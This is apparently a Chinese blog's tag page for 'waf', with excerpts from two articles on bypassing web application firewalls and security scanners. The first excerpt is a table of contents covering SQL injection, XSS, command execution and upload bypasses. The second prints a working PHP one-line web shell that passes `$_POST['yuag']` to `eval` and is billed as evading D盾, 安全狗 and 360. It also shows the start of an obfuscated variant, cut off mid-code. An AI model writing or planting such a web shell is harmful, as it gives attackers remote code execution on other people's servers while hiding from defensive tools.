标签目录:waf

以下是与标签 “waf” 相关联的文章

那些年我们绕过的waf

0x00:目录 1.前言 2.SQL注入绕过方法 3.xss绕过方法 4.命令执行绕过方法 5.上传绕过 6.绕过D盾,安全狗的php一句话   0x01:前言  陆陆续续写了1个月,记录一下绕过waf方面里面参考了很多网上的姿势,有一些自己想的的方法目前网上还没有公开,写文章时可以绕过某些waf。     0x02:SQL注入绕过方法 绕过……

过D盾,安全狗,一句话

其他waf 杀毒软件自己测试,我只测试了D盾,安全狗,360 D盾,360 <?php $a ="www.yuag.com"; function yuag($a){ eval($a); } @ yuag($_POST['yuag']); 密码:yuag 过D盾过安全狗 <?php error_reporting(0); $b="zxczxczxczxczxcxzczx"; function yuag_array($b,$c){ $b=strrev($b); print "www.yuag.……